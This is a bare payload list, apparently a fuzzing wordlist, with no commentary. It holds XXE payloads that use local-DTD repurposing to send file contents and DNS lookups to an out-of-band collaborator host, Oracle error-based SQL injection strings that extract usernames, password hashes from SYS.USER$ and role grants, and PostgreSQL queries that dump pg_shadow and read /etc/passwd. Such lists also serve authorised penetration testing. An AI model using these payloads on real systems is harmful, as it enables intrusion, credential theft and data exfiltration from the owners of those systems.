<?xml version="1.0" encoding="utf-8" standalone="no" ?><xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema"><xs:import schemaLocation="http://xxe-xsimport-schemalocation.$collabplz/"/></xs:schema> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema"><xs:import namespace="http://xxe-xsimport-namespace.$collabplz/"/></xs:schema> | |
<?xml-stylesheet href="http://xxe-xml-stylesheet.$collabplz/"?><x /> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\cim20.dtd"> <!ENTITY % CIMName '> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-1.$collabplz"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\wmi20.dtd"> <!ENTITY % CIMName '> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-2.$collabplz"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///C:\Program Files (x86)\Lotus\Notes\domino.dtd"><!ENTITY % boolean '(aa) #IMPLIED> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-3.$collabplz"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\xwizard.dtd"><!ENTITY % onerrortypes '(aa) #IMPLIED> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-4.$collabplz"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd"><!ENTITY % ISOamsa ' <!ENTITY % file SYSTEM "http://exfil-xxe-payload-5.$collabplz"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; '> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "jar:///usr/local/tomcat/lib/jsp-api.jar!/javax/servlet/jsp/resources/jspxml.dtd"><!ENTITY % URI '(aa) #IMPLIED> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-6.$collabplz"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "jar:///usr/local/tomcat/lib/tomcat-coyote.jar!/org/apache/tomcat/util/modeler/mbeans-descriptors.dtd"> <!ENTITY % Boolean '(aa) #IMPLIED> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-7.$collabplz"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd"> <!ENTITY % url.attribute.set '> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-8.$collabplz"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///opt/IBM/WebSphere/AppServer/properties/sip-app_1_0.dtd"> <!ENTITY % condition 'aaa)> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-9.$collabplz"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ELEMENT aa (bb'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd"> <!ENTITY % constant 'aaa)> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-10.$collabplz"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ELEMENT aa (bb'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/struts/struts-config_1_1.dtd"> <!ENTITY % AttributeName '(aa) #IMPLIED> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-11.$collabplz"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///u01/oracle/wlserver/server/lib/consoleapp/webapp/WEB-INF/struts-config_1_2.dtd"> <!ENTITY % AttributeName '(aa) #IMPLIED> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-12.$collabplz"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/gtksourceview-4/language-specs/language.dtd"> <!ENTITY % itemattrs '> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-13.$collabplz"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/lib/gap/pkg/GAPDoc-1.6.2/bibxmlext.dtd"> <!ENTITY % n.InProceedings 'aaa)> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-14.$collabplz"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ELEMENT aa (bb'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/boostbook/dtd/boostbook.dtd"> <!ENTITY % boost.common.attrib '> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-15.$collabplz"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "jar:///opt/jboss/wildfly/modules/system/layers/base/org/apache/lucene/main/lucene-queryparser-5.5.5.jar!/org/apache/lucene/queryparser/xml/LuceneCoreQuery.dtd"> <!ENTITY % queries 'aaa)> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-16.$collabplz"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ELEMENT aa (bb'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "jar:///opt/jboss/wildfly/modules/system/layers/base/org/apache/xml-resolver/main/xml-resolver-1.2.jar!/org/apache/xml/resolver/etc/catalog.dtd"> <!ENTITY % publicIdentifier '(aa) #IMPLIED> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-17.$collabplz"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/nmap/nmap.dtd"> <!ENTITY % attr_numeric '(aa) #IMPLIED> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-18.$collabplz"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/liteide/liteeditor/kate/language.dtd"> <!ENTITY % commonAttributes '> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-19.$collabplz"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/libgweather/locations.dtd"> <!ENTITY % name 'aaa)> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-20.$collabplz"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ELEMENT aa (bb'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/libgda-5.0/dtd/libgda-server-operation.dtd"> <!ENTITY % paramlist-dtd ' <!ENTITY % file SYSTEM "http://exfil-xxe-payload-21.$collabplz"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; '> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/libgda-5.0/dtd/libgda-paramlist.dtd"> <!ENTITY % array-dtd ' <!ENTITY % file SYSTEM "http://exfil-xxe-payload-22.$collabplz"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; '> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/docutils/docutils.dtd"> <!ENTITY % measure '(aa) #IMPLIED> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-23.$collabplz"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/dblatex/schema/dblatex-config.dtd"> <!ENTITY % attlist.modname '> <!ENTITY % file SYSTEM "http://exfil-xxe-payload-24.$collabplz"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/lib64/erlang/lib/docbuilder-0.9.8.11/dtd/application.dtd"> <!ENTITY % block "xxx" > <!ENTITY % common ' <!ENTITY % file SYSTEM "http://exfil-xxe-payload-25.$collabplz"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; '> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/local/tomcat/lib/servlet-api.jar!/javax/servlet/resources/XMLSchema.dtd"> <!ENTITY % xs-datatypes ' <!ENTITY % file SYSTEM "http://exfil-xxe-payload-26.$collabplz"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///abcxyz/%file;'>"> %eval; %error; '> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\cim20.dtd"> <!ENTITY % CIMName '> <!ENTITY % file "dns-exfil-1"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.$collabplz/%file;'>"> %eval; %error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\wmi20.dtd"> <!ENTITY % CIMName '> <!ENTITY % file "dns-exfil-2"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.$collabplz/%file;'>"> %eval; %error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///C:\Program Files (x86)\Lotus\Notes\domino.dtd"><!ENTITY % boolean '(aa) #IMPLIED> <!ENTITY % file "dns-exfil-3"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.$collabplz/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\xwizard.dtd"><!ENTITY % onerrortypes '(aa) #IMPLIED> <!ENTITY % file "dns-exfil-4"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.$collabplz/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd"><!ENTITY % ISOamsa ' <!ENTITY % file "dns-exfil-5"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.$collabplz/%file;'>"> %eval; %error; '> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "jar:///usr/local/tomcat/lib/jsp-api.jar!/javax/servlet/jsp/resources/jspxml.dtd"><!ENTITY % URI '(aa) #IMPLIED> <!ENTITY % file "dns-exfil-6"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.$collabplz/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "jar:///usr/local/tomcat/lib/tomcat-coyote.jar!/org/apache/tomcat/util/modeler/mbeans-descriptors.dtd"> <!ENTITY % Boolean '(aa) #IMPLIED> <!ENTITY % file "dns-exfil-7"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.$collabplz/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd"> <!ENTITY % url.attribute.set '> <!ENTITY % file "dns-exfil-8"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.$collabplz/%file;'>"> %eval; %error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///opt/IBM/WebSphere/AppServer/properties/sip-app_1_0.dtd"> <!ENTITY % condition 'aaa)> <!ENTITY % file "dns-exfil-9"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.$collabplz/%file;'>"> %eval; %error; <!ELEMENT aa (bb'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd"> <!ENTITY % constant 'aaa)> <!ENTITY % file "dns-exfil-10"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.$collabplz/%file;'>"> %eval; %error; <!ELEMENT aa (bb'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/struts/struts-config_1_1.dtd"> <!ENTITY % AttributeName '(aa) #IMPLIED> <!ENTITY % file "dns-exfil-11"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.$collabplz/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///u01/oracle/wlserver/server/lib/consoleapp/webapp/WEB-INF/struts-config_1_2.dtd"> <!ENTITY % AttributeName '(aa) #IMPLIED> <!ENTITY % file "dns-exfil-12"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.$collabplz/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/gtksourceview-4/language-specs/language.dtd"> <!ENTITY % itemattrs '> <!ENTITY % file "dns-exfil-13"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.$collabplz/%file;'>"> %eval; %error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/lib/gap/pkg/GAPDoc-1.6.2/bibxmlext.dtd"> <!ENTITY % n.InProceedings 'aaa)> <!ENTITY % file "dns-exfil-14"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.$collabplz/%file;'>"> %eval; %error; <!ELEMENT aa (bb'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/boostbook/dtd/boostbook.dtd"> <!ENTITY % boost.common.attrib '> <!ENTITY % file "dns-exfil-15"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.$collabplz/%file;'>"> %eval; %error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "jar:///opt/jboss/wildfly/modules/system/layers/base/org/apache/lucene/main/lucene-queryparser-5.5.5.jar!/org/apache/lucene/queryparser/xml/LuceneCoreQuery.dtd"> <!ENTITY % queries 'aaa)> <!ENTITY % file "dns-exfil-16"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.$collabplz/%file;'>"> %eval; %error; <!ELEMENT aa (bb'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "jar:///opt/jboss/wildfly/modules/system/layers/base/org/apache/xml-resolver/main/xml-resolver-1.2.jar!/org/apache/xml/resolver/etc/catalog.dtd"> <!ENTITY % publicIdentifier '(aa) #IMPLIED> <!ENTITY % file "dns-exfil-17"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.$collabplz/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/nmap/nmap.dtd"> <!ENTITY % attr_numeric '(aa) #IMPLIED> <!ENTITY % file "dns-exfil-18"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.$collabplz/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/liteide/liteeditor/kate/language.dtd"> <!ENTITY % commonAttributes '> <!ENTITY % file "dns-exfil-19"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.$collabplz/%file;'>"> %eval; %error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/libgweather/locations.dtd"> <!ENTITY % name 'aaa)> <!ENTITY % file "dns-exfil-20"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.$collabplz/%file;'>"> %eval; %error; <!ELEMENT aa (bb'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/libgda-5.0/dtd/libgda-server-operation.dtd"> <!ENTITY % paramlist-dtd ' <!ENTITY % file "dns-exfil-21"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.$collabplz/%file;'>"> %eval; %error; '> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/libgda-5.0/dtd/libgda-paramlist.dtd"> <!ENTITY % array-dtd ' <!ENTITY % file "dns-exfil-22"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.$collabplz/%file;'>"> %eval; %error; '> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/docutils/docutils.dtd"> <!ENTITY % measure '(aa) #IMPLIED> <!ENTITY % file "dns-exfil-23"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.$collabplz/%file;'>"> %eval; %error; <!ATTLIST attxx aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/dblatex/schema/dblatex-config.dtd"> <!ENTITY % attlist.modname '> <!ENTITY % file "dns-exfil-24"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.$collabplz/%file;'>"> %eval; %error; <!ELEMENT aa "bb"'> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/lib64/erlang/lib/docbuilder-0.9.8.11/dtd/application.dtd"> <!ENTITY % block "xxx" > <!ENTITY % common ' <!ENTITY % file "dns-exfil-25"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.$collabplz/%file;'>"> %eval; %error; '> %local_dtd;]><message></message> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE message [ <!ENTITY % local_dtd SYSTEM "file:///usr/local/tomcat/lib/servlet-api.jar!/javax/servlet/resources/XMLSchema.dtd"> <!ENTITY % xs-datatypes ' <!ENTITY % file "dns-exfil-26"> <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://%file;.$collabplz/%file;'>"> %eval; %error; '> %local_dtd;]><message></message> | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=4)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=4)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=5)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=5)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=5)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=5)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=5)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=6)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=6)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=6)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=6)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=6)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=7)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=7)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=7)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=7)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=7)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=8)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=8)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=8)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=8)) AND 'i'='i | |
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=8)) AND 'i'='i | |
# info disclosure payload fuzzfile for pgsql | |
select version(); | |
select current_database(); | |
select current_user; | |
select session_user; | |
select current_setting('log_connections'); | |
select current_setting('log_statement'); | |
select current_setting('port'); | |
select current_setting('password_encryption'); | |
select current_setting('krb_server_keyfile'); | |
select current_setting('virtual_host'); | |
select current_setting('port'); | |
select current_setting('config_file'); | |
select current_setting('hba_file'); | |
select current_setting('data_directory'); | |
select * from pg_shadow; | |
select * from pg_group; | |
create table myfile (input TEXT); | |
copy myfile from '/etc/passwd'; | |
